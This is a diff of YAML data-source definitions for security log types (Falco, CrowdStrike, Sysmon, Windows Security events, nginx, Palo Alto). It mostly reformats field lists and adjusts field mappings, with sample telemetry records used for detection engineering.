(darwin/arm64) kubernetes/7f6f68f","objectRef":{"resource":"jobs","namespace":"test2","apiGroup":"batch","apiVersion":"v1"},"responseStatus":{"metadata":{},"status":"Failure","message":"jobs.batch
|
||||
is forbidden: User \"k8s-test-user\" cannot create resource \"jobs\" in API group
|
||||
\"batch\" in the namespace \"test2\"","reason":"Forbidden","details":{"group":"batch","kind":"jobs"},"code":403},"responseObject":{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"jobs.batch
|
||||
|
||||
@@ -3,46 +3,46 @@ id: 23c0eeed-840a-4711-a41b-6819c1ffbba5
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: kubernetes
|
||||
sourcetype: kube:container:falco
|
||||
separator: null
|
||||
supported_TA: {}
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- command
|
||||
- container_id
|
||||
- container_image
|
||||
- container_image_tag
|
||||
- container_name
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- evt_type
|
||||
- exe_flags
|
||||
- host
|
||||
- index
|
||||
- k8s_ns
|
||||
- k8s_pod_name
|
||||
- linecount
|
||||
- parent
|
||||
- proc_exepath
|
||||
- process
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- terminal
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- user
|
||||
- user_loginuid
|
||||
- user_uid
|
||||
example_log: '12:18:18.691725165: Notice A shell was spawned in a container with an
|
||||
- _time
|
||||
- command
|
||||
- container_id
|
||||
- container_image
|
||||
- container_image_tag
|
||||
- container_name
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- evt_type
|
||||
- exe_flags
|
||||
- host
|
||||
- index
|
||||
- k8s_ns
|
||||
- k8s_pod_name
|
||||
- linecount
|
||||
- parent
|
||||
- proc_exepath
|
||||
- process
|
||||
- punct
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- terminal
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- user
|
||||
- user_loginuid
|
||||
- user_uid
|
||||
example_log:
|
||||
"12:18:18.691725165: Notice A shell was spawned in a container with an
|
||||
attached terminal (evt_type=execve user=root user_uid=0 user_loginuid=-1 process=bash
|
||||
proc_exepath=/usr/lib/splunk-otel-collector/agent-bundle/bin/bash parent=runc command=bash
|
||||
-il terminal=34816 exe_flags=EXE_WRITABLE container_id=7a2566e8e462 container_image=quay.io/signalfx/splunk-otel-collector
|
||||
container_image_tag=0.88.0 container_name=otel-collector k8s_ns=default k8s_pod_name=my-splunk-otel-collector-agent-9sdhr)'
|
||||
container_image_tag=0.88.0 container_name=otel-collector k8s_ns=default k8s_pod_name=my-splunk-otel-collector-agent-9sdhr)"
|
||||
|
||||
@@ -1,92 +1,92 @@
|
||||
event_name: Crowdstrike ProcessRollup2
|
||||
fields:
|
||||
- AuthenticationId
|
||||
- AuthenticationId_meaning
|
||||
- AuthenticodeHashData
|
||||
- CommandLine
|
||||
- ConfigBuild
|
||||
- ConfigStateHash
|
||||
- EffectiveTransmissionClass
|
||||
- Entitlements
|
||||
- EventOrigin
|
||||
- ImageFileName
|
||||
- ImageSubsystem
|
||||
- ImageSubsystem_meaning
|
||||
- IntegrityLevel
|
||||
- IntegrityLevel_meaning
|
||||
- MD5HashData
|
||||
- ParentAuthenticationId
|
||||
- ParentBaseFileName
|
||||
- ParentProcessId
|
||||
- ProcessCreateFlags
|
||||
- ProcessEndTime
|
||||
- ProcessParameterFlags
|
||||
- ProcessParameterFlags_meaning
|
||||
- ProcessStartTime
|
||||
- ProcessSxsFlags
|
||||
- ProcessSxsFlags_meaning
|
||||
- RawProcessId
|
||||
- SHA1HashData
|
||||
- SHA256HashData
|
||||
- SessionId
|
||||
- SignInfoFlags
|
||||
- SignInfoFlags_meaning
|
||||
- SourceProcessId
|
||||
- SourceThreadId
|
||||
- Tags
|
||||
- TargetProcessId
|
||||
- TokenType
|
||||
- TokenType_meaning
|
||||
- UserSid
|
||||
- WindowFlags
|
||||
- WindowFlags_meaning
|
||||
- action
|
||||
- aid
|
||||
- aid_city
|
||||
- aid_computer_name
|
||||
- aid_continent
|
||||
- aid_country
|
||||
- aid_machine_domain
|
||||
- aid_os_version
|
||||
- aid_ou
|
||||
- aid_site_name
|
||||
- aid_system_product_name
|
||||
- aip
|
||||
- cid
|
||||
- dest
|
||||
- event_ingest_time
|
||||
- event_platform
|
||||
- event_simpleName
|
||||
- eventtype
|
||||
- host_res_aid
|
||||
- id
|
||||
- os
|
||||
- parent_process_exec
|
||||
- parent_process_id
|
||||
- parent_process_name
|
||||
- process
|
||||
- process_exec
|
||||
- process_hash
|
||||
- process_id
|
||||
- process_integrity_level
|
||||
- process_name
|
||||
- process_path
|
||||
- resolve_dest
|
||||
- resolve_process_integrity_level
|
||||
- tag
|
||||
- timestamp
|
||||
- user
|
||||
- user_id
|
||||
- vendor_product
|
||||
- AuthenticationId
|
||||
- AuthenticationId_meaning
|
||||
- AuthenticodeHashData
|
||||
- CommandLine
|
||||
- ConfigBuild
|
||||
- ConfigStateHash
|
||||
- EffectiveTransmissionClass
|
||||
- Entitlements
|
||||
- EventOrigin
|
||||
- ImageFileName
|
||||
- ImageSubsystem
|
||||
- ImageSubsystem_meaning
|
||||
- IntegrityLevel
|
||||
- IntegrityLevel_meaning
|
||||
- MD5HashData
|
||||
- ParentAuthenticationId
|
||||
- ParentBaseFileName
|
||||
- ParentProcessId
|
||||
- ProcessCreateFlags
|
||||
- ProcessEndTime
|
||||
- ProcessParameterFlags
|
||||
- ProcessParameterFlags_meaning
|
||||
- ProcessStartTime
|
||||
- ProcessSxsFlags
|
||||
- ProcessSxsFlags_meaning
|
||||
- RawProcessId
|
||||
- SHA1HashData
|
||||
- SHA256HashData
|
||||
- SessionId
|
||||
- SignInfoFlags
|
||||
- SignInfoFlags_meaning
|
||||
- SourceProcessId
|
||||
- SourceThreadId
|
||||
- Tags
|
||||
- TargetProcessId
|
||||
- TokenType
|
||||
- TokenType_meaning
|
||||
- UserSid
|
||||
- WindowFlags
|
||||
- WindowFlags_meaning
|
||||
- action
|
||||
- aid
|
||||
- aid_city
|
||||
- aid_computer_name
|
||||
- aid_continent
|
||||
- aid_country
|
||||
- aid_machine_domain
|
||||
- aid_os_version
|
||||
- aid_ou
|
||||
- aid_site_name
|
||||
- aid_system_product_name
|
||||
- aip
|
||||
- cid
|
||||
- dest
|
||||
- event_ingest_time
|
||||
- event_platform
|
||||
- event_simpleName
|
||||
- eventtype
|
||||
- host_res_aid
|
||||
- id
|
||||
- os
|
||||
- parent_process_exec
|
||||
- parent_process_id
|
||||
- parent_process_name
|
||||
- process
|
||||
- process_exec
|
||||
- process_hash
|
||||
- process_id
|
||||
- process_integrity_level
|
||||
- process_name
|
||||
- process_path
|
||||
- resolve_dest
|
||||
- resolve_process_integrity_level
|
||||
- tag
|
||||
- timestamp
|
||||
- user
|
||||
- user_id
|
||||
- vendor_product
|
||||
field_mappings:
|
||||
- data_model: cim
|
||||
data_set: Endpoint.Processes
|
||||
mapping:
|
||||
CommandLine: Processes.process
|
||||
ImageFileName: Processes.process_path
|
||||
ImageFileName: Processes.process_path
|
||||
ParentBaseFileName: Processes.parent_process_name
|
||||
ParentProcessId: Processes.parent_process_id
|
||||
RawProcessId: Processes.process_id
|
||||
SHA256HashData: Processes.process_hash
|
||||
UserSid: Processes.user
|
||||
example_log: {"LinkName":"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\Windows PowerShell.lnk","ProcessCreateFlags":"67634196","IntegrityLevel":"12288","ParentProcessId":"5459598860","SourceProcessId":"5459598860","aip":"3.126.231.40","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-586445407-708991241-1829972403-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"explorer.exe","EventOrigin":"1","ImageSubsystem":"3","id":"e2210781-0e8f-47d2-bf6a-56d2c59f38ee","EffectiveTransmissionClass":"3","SessionId":"2","ShowWindowFlags":"1","Tags":"27, 40, 151, 874, 924, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1713805173418","event_simpleName":"ProcessRollup2","RawProcessId":"5012","ConfigStateHash":"840884426","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"2669499","ConfigBuild":"1007.3.0018207.1","WindowFlags":"3073","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentAuthenticationId":"2669499","TargetProcessId":"5642133882","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"30426051160","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1713805173.321","ProcessParameterFlags":"24577","aid":"168a90e125d443beb2a4e2914985084d","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}
|
||||
example_log: '{"LinkName":"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\Windows PowerShell.lnk","ProcessCreateFlags":"67634196","IntegrityLevel":"12288","ParentProcessId":"5459598860","SourceProcessId":"5459598860","aip":"3.126.231.40","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-586445407-708991241-1829972403-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"explorer.exe","EventOrigin":"1","ImageSubsystem":"3","id":"e2210781-0e8f-47d2-bf6a-56d2c59f38ee","EffectiveTransmissionClass":"3","SessionId":"2","ShowWindowFlags":"1","Tags":"27, 40, 151, 874, 924, 12094627905582, 12094627906234, 211106232533012, 212205744161605, 263882790666253","timestamp":"1713805173418","event_simpleName":"ProcessRollup2","RawProcessId":"5012","ConfigStateHash":"840884426","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"2669499","ConfigBuild":"1007.3.0018207.1","WindowFlags":"3073","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentAuthenticationId":"2669499","TargetProcessId":"5642133882","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SourceThreadId":"30426051160","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1713805173.321","ProcessParameterFlags":"24577","aid":"168a90e125d443beb2a4e2914985084d","SignInfoFlags":"8683538","cid":"124cb22314bf4f519be84bce582e7a6b"}'
|
||||
|
||||
@@ -1,102 +1,102 @@
|
||||
event_name: Sysmon EventID 1
|
||||
fields:
|
||||
- _time
|
||||
- Channel
|
||||
- CommandLine
|
||||
- Company
|
||||
- Computer
|
||||
- CurrentDirectory
|
||||
- Description
|
||||
- EventChannel
|
||||
- EventCode
|
||||
- EventData_Xml
|
||||
- EventDescription
|
||||
- EventID
|
||||
- EventRecordID
|
||||
- FileVersion
|
||||
- Guid
|
||||
- Hashes
|
||||
- IMPHASH
|
||||
- Image
|
||||
- IntegrityLevel
|
||||
- Keywords
|
||||
- Level
|
||||
- LogonGuid
|
||||
- LogonId
|
||||
- MD5
|
||||
- Name
|
||||
- Opcode
|
||||
- OriginalFileName
|
||||
- ParentCommandLine
|
||||
- ParentImage
|
||||
- ParentProcessGuid
|
||||
- ParentProcessId
|
||||
- ProcessGuid
|
||||
- ProcessID
|
||||
- ProcessId
|
||||
- Product
|
||||
- RecordID
|
||||
- RecordNumber
|
||||
- RuleName
|
||||
- SHA256
|
||||
- SecurityID
|
||||
- SystemTime
|
||||
- System_Props_Xml
|
||||
- Task
|
||||
- TerminalSessionId
|
||||
- ThreadID
|
||||
- TimeCreated
|
||||
- User
|
||||
- UserID
|
||||
- UtcTime
|
||||
- Version
|
||||
- action
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- dvc_nt_host
|
||||
- event_id
|
||||
- eventtype
|
||||
- host
|
||||
- id
|
||||
- index
|
||||
- linecount
|
||||
- original_file_name
|
||||
- os
|
||||
- parent_process
|
||||
- parent_process_exec
|
||||
- parent_process_guid
|
||||
- parent_process_id
|
||||
- parent_process_name
|
||||
- parent_process_path
|
||||
- process
|
||||
- process_current_directory
|
||||
- process_exec
|
||||
- process_guid
|
||||
- process_hash
|
||||
- process_id
|
||||
- process_integrity_level
|
||||
- process_name
|
||||
- process_path
|
||||
- punct
|
||||
- signature
|
||||
- signature_id
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- user
|
||||
- user_id
|
||||
- vendor_product
|
||||
- _time
|
||||
- Channel
|
||||
- CommandLine
|
||||
- Company
|
||||
- Computer
|
||||
- CurrentDirectory
|
||||
- Description
|
||||
- EventChannel
|
||||
- EventCode
|
||||
- EventData_Xml
|
||||
- EventDescription
|
||||
- EventID
|
||||
- EventRecordID
|
||||
- FileVersion
|
||||
- Guid
|
||||
- Hashes
|
||||
- IMPHASH
|
||||
- Image
|
||||
- IntegrityLevel
|
||||
- Keywords
|
||||
- Level
|
||||
- LogonGuid
|
||||
- LogonId
|
||||
- MD5
|
||||
- Name
|
||||
- Opcode
|
||||
- OriginalFileName
|
||||
- ParentCommandLine
|
||||
- ParentImage
|
||||
- ParentProcessGuid
|
||||
- ParentProcessId
|
||||
- ProcessGuid
|
||||
- ProcessID
|
||||
- ProcessId
|
||||
- Product
|
||||
- RecordID
|
||||
- RecordNumber
|
||||
- RuleName
|
||||
- SHA256
|
||||
- SecurityID
|
||||
- SystemTime
|
||||
- System_Props_Xml
|
||||
- Task
|
||||
- TerminalSessionId
|
||||
- ThreadID
|
||||
- TimeCreated
|
||||
- User
|
||||
- UserID
|
||||
- UtcTime
|
||||
- Version
|
||||
- action
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- dvc_nt_host
|
||||
- event_id
|
||||
- eventtype
|
||||
- host
|
||||
- id
|
||||
- index
|
||||
- linecount
|
||||
- original_file_name
|
||||
- os
|
||||
- parent_process
|
||||
- parent_process_exec
|
||||
- parent_process_guid
|
||||
- parent_process_id
|
||||
- parent_process_name
|
||||
- parent_process_path
|
||||
- process
|
||||
- process_current_directory
|
||||
- process_exec
|
||||
- process_guid
|
||||
- process_hash
|
||||
- process_id
|
||||
- process_integrity_level
|
||||
- process_name
|
||||
- process_path
|
||||
- punct
|
||||
- signature
|
||||
- signature_id
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- user
|
||||
- user_id
|
||||
- vendor_product
|
||||
field_mappings:
|
||||
- data_model: cim
|
||||
data_set: Endpoint.Processes
|
||||
@@ -117,9 +117,9 @@ field_mappings:
|
||||
Computer: Processes.dest
|
||||
OriginalFileName: Processes.original_file_name
|
||||
convert_to_log_source:
|
||||
- data_source: Windows Security 4688
|
||||
- data_source: Windows Event Log Security 4688
|
||||
mapping:
|
||||
ProcessId: NewProcessId
|
||||
ProcessId: NewProcessId
|
||||
Image: NewProcessName
|
||||
Image|endswith: NewProcessName|endswith
|
||||
CommandLine: Process_Command_Line
|
||||
|
||||
@@ -1,81 +1,81 @@
|
||||
event_name: Windows Event Log Security 4688
|
||||
fields:
|
||||
- Caller_Domain
|
||||
- Caller_User_Name
|
||||
- Channel
|
||||
- CommandLine
|
||||
- Computer
|
||||
- Error_Code
|
||||
- EventCode
|
||||
- EventID
|
||||
- EventRecordID
|
||||
- Guid
|
||||
- Keywords
|
||||
- Level
|
||||
- Logon_ID
|
||||
- MandatoryLabel
|
||||
- Name
|
||||
- NewProcessId
|
||||
- NewProcessName
|
||||
- Opcode
|
||||
- ParentProcessName
|
||||
- ProcessID
|
||||
- Process_Command_Line
|
||||
- RecordNumber
|
||||
- SubjectDomainName
|
||||
- SubjectLogonId
|
||||
- SubjectUserName
|
||||
- SubjectUserSid
|
||||
- SystemTime
|
||||
- TargetDomainName
|
||||
- TargetLogonId
|
||||
- TargetUserName
|
||||
- TargetUserSid
|
||||
- Target_Domain
|
||||
- Target_User_Name
|
||||
- Task
|
||||
- ThreadID
|
||||
- TokenElevationType
|
||||
- Token_Elevation_Type
|
||||
- Token_Elevation_Type_id
|
||||
- Version
|
||||
- action
|
||||
- app
|
||||
- dest
|
||||
- dvc
|
||||
- dvc_nt_host
|
||||
- event_id
|
||||
- eventtype
|
||||
- id
|
||||
- name
|
||||
- new_process
|
||||
- new_process_id
|
||||
- new_process_name
|
||||
- parent_process
|
||||
- parent_process_id
|
||||
- parent_process_name
|
||||
- parent_process_path
|
||||
- process
|
||||
- process_command_line_arguments
|
||||
- process_command_line_process
|
||||
- process_exec
|
||||
- process_id
|
||||
- process_name
|
||||
- process_path
|
||||
- product
|
||||
- session_id
|
||||
- signature
|
||||
- signature_id
|
||||
- src_nt_domain
|
||||
- src_user
|
||||
- status
|
||||
- subject
|
||||
- ta_windows_action
|
||||
- tag
|
||||
- user
|
||||
- user_group
|
||||
- vendor
|
||||
- vendor_product
|
||||
- Caller_Domain
|
||||
- Caller_User_Name
|
||||
- Channel
|
||||
- CommandLine
|
||||
- Computer
|
||||
- Error_Code
|
||||
- EventCode
|
||||
- EventID
|
||||
- EventRecordID
|
||||
- Guid
|
||||
- Keywords
|
||||
- Level
|
||||
- Logon_ID
|
||||
- MandatoryLabel
|
||||
- Name
|
||||
- NewProcessId
|
||||
- NewProcessName
|
||||
- Opcode
|
||||
- ParentProcessName
|
||||
- ProcessID
|
||||
- Process_Command_Line
|
||||
- RecordNumber
|
||||
- SubjectDomainName
|
||||
- SubjectLogonId
|
||||
- SubjectUserName
|
||||
- SubjectUserSid
|
||||
- SystemTime
|
||||
- TargetDomainName
|
||||
- TargetLogonId
|
||||
- TargetUserName
|
||||
- TargetUserSid
|
||||
- Target_Domain
|
||||
- Target_User_Name
|
||||
- Task
|
||||
- ThreadID
|
||||
- TokenElevationType
|
||||
- Token_Elevation_Type
|
||||
- Token_Elevation_Type_id
|
||||
- Version
|
||||
- action
|
||||
- app
|
||||
- dest
|
||||
- dvc
|
||||
- dvc_nt_host
|
||||
- event_id
|
||||
- eventtype
|
||||
- id
|
||||
- name
|
||||
- new_process
|
||||
- new_process_id
|
||||
- new_process_name
|
||||
- parent_process
|
||||
- parent_process_id
|
||||
- parent_process_name
|
||||
- parent_process_path
|
||||
- process
|
||||
- process_command_line_arguments
|
||||
- process_command_line_process
|
||||
- process_exec
|
||||
- process_id
|
||||
- process_name
|
||||
- process_path
|
||||
- product
|
||||
- session_id
|
||||
- signature
|
||||
- signature_id
|
||||
- src_nt_domain
|
||||
- src_user
|
||||
- status
|
||||
- subject
|
||||
- ta_windows_action
|
||||
- tag
|
||||
- user
|
||||
- user_group
|
||||
- vendor
|
||||
- vendor_product
|
||||
field_mappings:
|
||||
- data_model: cim
|
||||
data_set: Endpoint.Processes
|
||||
|
||||
@@ -1,90 +1,102 @@
|
||||
event_name: Windows Event Log Security 5145
|
||||
fields:
|
||||
- _time
|
||||
- AccessList
|
||||
- AccessMask
|
||||
- AccessReason
|
||||
- Caller_Domain
|
||||
- Caller_User_Name
|
||||
- Channel
|
||||
- Computer
|
||||
- Error_Code
|
||||
- EventCode
|
||||
- EventData_Xml
|
||||
- EventID
|
||||
- EventRecordID
|
||||
- Guid
|
||||
- IpAddress
|
||||
- IpPort
|
||||
- Keywords
|
||||
- Level
|
||||
- Logon_ID
|
||||
- Name
|
||||
- ObjectType
|
||||
- Opcode
|
||||
- ProcessID
|
||||
- RecordNumber
|
||||
- RelativeTargetName
|
||||
- ShareLocalPath
|
||||
- ShareName
|
||||
- Source_Port
|
||||
- Source_Workstation
|
||||
- SubjectDomainName
|
||||
- SubjectLogonId
|
||||
- SubjectUserName
|
||||
- SubjectUserSid
|
||||
- SystemTime
|
||||
- System_Props_Xml
|
||||
- Task
|
||||
- ThreadID
|
||||
- Version
|
||||
- action
|
||||
- app
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- dvc
|
||||
- dvc_nt_host
|
||||
- event_id
|
||||
- eventtype
|
||||
- file_name
|
||||
- file_path
|
||||
- host
|
||||
- id
|
||||
- index
|
||||
- linecount
|
||||
- name
|
||||
- product
|
||||
- punct
|
||||
- session_id
|
||||
- signature
|
||||
- signature_id
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src
|
||||
- src_ip
|
||||
- src_nt_domain
|
||||
- src_nt_host
|
||||
- src_port
|
||||
- src_user
|
||||
- status
|
||||
- subject
|
||||
- ta_windows_action
|
||||
- tag
|
||||
- tag::action
|
||||
- tag::eventtype
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- vendor
|
||||
- vendor_product
|
||||
- _time
|
||||
- AccessList
|
||||
- AccessMask
|
||||
- AccessReason
|
||||
- Caller_Domain
|
||||
- Caller_User_Name
|
||||
- Channel
|
||||
- Computer
|
||||
- Error_Code
|
||||
- EventCode
|
||||
- EventData_Xml
|
||||
- EventID
|
||||
- EventRecordID
|
||||
- Guid
|
||||
- IpAddress
|
||||
- IpPort
|
||||
- Keywords
|
||||
- Level
|
||||
- Logon_ID
|
||||
- Name
|
||||
- ObjectType
|
||||
- Opcode
|
||||
- ProcessID
|
||||
- RecordNumber
|
||||
- RelativeTargetName
|
||||
- ShareLocalPath
|
||||
- ShareName
|
||||
- Source_Port
|
||||
- Source_Workstation
|
||||
- SubjectDomainName
|
||||
- SubjectLogonId
|
||||
- SubjectUserName
|
||||
- SubjectUserSid
|
||||
- SystemTime
|
||||
- System_Props_Xml
|
||||
- Task
|
||||
- ThreadID
|
||||
- Version
|
||||
- action
|
||||
- app
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- dvc
|
||||
- dvc_nt_host
|
||||
- event_id
|
||||
- eventtype
|
||||
- file_name
|
||||
- file_path
|
||||
- host
|
||||
- id
|
||||
- index
|
||||
- linecount
|
||||
- name
|
||||
- product
|
||||
- punct
|
||||
- session_id
|
||||
- signature
|
||||
- signature_id
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src
|
||||
- src_ip
|
||||
- src_nt_domain
|
||||
- src_nt_host
|
||||
- src_port
|
||||
- src_user
|
||||
- status
|
||||
- subject
|
||||
- ta_windows_action
|
||||
- tag
|
||||
- tag::action
|
||||
- tag::eventtype
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- vendor
|
||||
- vendor_product
|
||||
field_mappings:
|
||||
- data_model: custom_cim
|
||||
data_set: Endpoint.Processes
|
||||
mapping:
|
||||
AccessList: access_list
|
||||
AccessMask: access_mask
|
||||
AccessReason: access_result
|
||||
ShareLocalPath: share_local_path
|
||||
RelativeTargetName: relative_target_name
|
||||
IpAddress: src_ip
|
||||
IpPort: src_port
|
||||
SubjectUserName: user
|
||||
ShareName: share
|
||||
- data_model: ocsf
|
||||
mapping:
|
||||
AccessList: access_list
|
||||
@@ -99,6 +111,5 @@ field_mappings:
|
||||
SubjectUserName: actor.user.name
|
||||
SubjectLogonId: actor.session.uid
|
||||
SubjectUserSid: actor.user.uid
|
||||
EventID: metadata.event_code
|
||||
ShareName: unmapped.EventData.ShareName
|
||||
ShareName: share
|
||||
example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>5145</EventID><Version>0</Version><Level>0</Level><Task>12811</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2024-03-11T03:06:39.742608600Z'/><EventRecordID>2018939</EventRecordID><Correlation/><Execution ProcessID='4' ThreadID='304'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>ANONYMOUS LOGON</Data><Data Name='SubjectUserName'>ANONYMOUS LOGON</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x13ef1b</Data><Data Name='ObjectType'>File</Data><Data Name='IpAddress'>10.0.1.15</Data><Data Name='IpPort'>50160</Data><Data Name='ShareName'>\\*\SYSVOL</Data><Data Name='ShareLocalPath'>\??\C:\Windows\SYSVOL\sysvol</Data><Data Name='RelativeTargetName'>lsarpc</Data><Data Name='AccessMask'>0x120089</Data><Data Name='AccessList'>%%1538
|
||||
|
||||
@@ -3,6 +3,5 @@ id: c5d9612b-0ffd-44d3-8247-3cf3486ec5e2
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: bro:http:json
|
||||
sourcetype: bro:http:json
|
||||
separator: null
|
||||
supported_TA: {}
|
||||
event_names: []
|
||||
|
||||
@@ -3,70 +3,70 @@ id: c716a418-eab3-4df5-9dff-5420174e3068
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: /var/log/nginx/access.log
|
||||
sourcetype: nginx:plus:kv
|
||||
separator: null
|
||||
supported_TA: {}
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- action
|
||||
- app
|
||||
- bytes
|
||||
- bytes_in
|
||||
- bytes_out
|
||||
- category
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- dest_ip
|
||||
- dest_port
|
||||
- eventtype
|
||||
- host
|
||||
- http_content_type
|
||||
- http_method
|
||||
- http_referer
|
||||
- http_user_agent
|
||||
- http_user_agent_length
|
||||
- http_x_forwarded_for
|
||||
- http_x_header
|
||||
- https
|
||||
- index
|
||||
- linecount
|
||||
- nginx_version
|
||||
- product
|
||||
- protocol
|
||||
- punct
|
||||
- request_time
|
||||
- response_time
|
||||
- server
|
||||
- site
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src
|
||||
- src_ip
|
||||
- status
|
||||
- status_description
|
||||
- status_type
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- time_local
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- uri_path
|
||||
- url
|
||||
- url_domain
|
||||
- url_length
|
||||
- vendor
|
||||
- vendor_product
|
||||
- version
|
||||
- web_server
|
||||
example_log: site="www.example.com" server="www.example.com" dest_port="443" dest_ip="192.0.2.1"
|
||||
- _time
|
||||
- action
|
||||
- app
|
||||
- bytes
|
||||
- bytes_in
|
||||
- bytes_out
|
||||
- category
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
||||
- date_zone
|
||||
- dest
|
||||
- dest_ip
|
||||
- dest_port
|
||||
- eventtype
|
||||
- host
|
||||
- http_content_type
|
||||
- http_method
|
||||
- http_referer
|
||||
- http_user_agent
|
||||
- http_user_agent_length
|
||||
- http_x_forwarded_for
|
||||
- http_x_header
|
||||
- https
|
||||
- index
|
||||
- linecount
|
||||
- nginx_version
|
||||
- product
|
||||
- protocol
|
||||
- punct
|
||||
- request_time
|
||||
- response_time
|
||||
- server
|
||||
- site
|
||||
- source
|
||||
- sourcetype
|
||||
- splunk_server
|
||||
- src
|
||||
- src_ip
|
||||
- status
|
||||
- status_description
|
||||
- status_type
|
||||
- tag
|
||||
- tag::eventtype
|
||||
- time_local
|
||||
- timeendpos
|
||||
- timestartpos
|
||||
- uri_path
|
||||
- url
|
||||
- url_domain
|
||||
- url_length
|
||||
- vendor
|
||||
- vendor_product
|
||||
- version
|
||||
- web_server
|
||||
example_log:
|
||||
site="www.example.com" server="www.example.com" dest_port="443" dest_ip="192.0.2.1"
|
||||
src="198.51.100.1" src_ip="198.51.100.1" user="-" time_local="22/Feb/2024:13:00:00
|
||||
-0500" protocol="HTTP/1.1" status="200" bytes_out="1073741000" bytes_in="234" http_referer="-"
|
||||
http_user_agent="python-requests/2.25.1" nginx_version="1.18.0" http_x_forwarded_for="-"
|
||||
|
||||
@@ -3,32 +3,32 @@ id: 375c2b0e-d216-41ad-9406-200464595209
|
||||
author: Patrick Bareiss, Splunk
|
||||
source: pan:threat
|
||||
sourcetype: pan:threat
|
||||
separator: null
|
||||
supported_TA:
|
||||
name: Palo Alto Networks Add-on for Splunk
|
||||
version: 8.1.1
|
||||
url: https://splunkbase.splunk.com/app/2757
|
||||
event_names: []
|
||||
fields:
|
||||
- _time
|
||||
- date_hour
|
||||
- date_mday
|
||||
- date_minute
|
||||
- date_month
|
||||
- date_second
|
||||
- date_wday
|
||||
- date_year
|
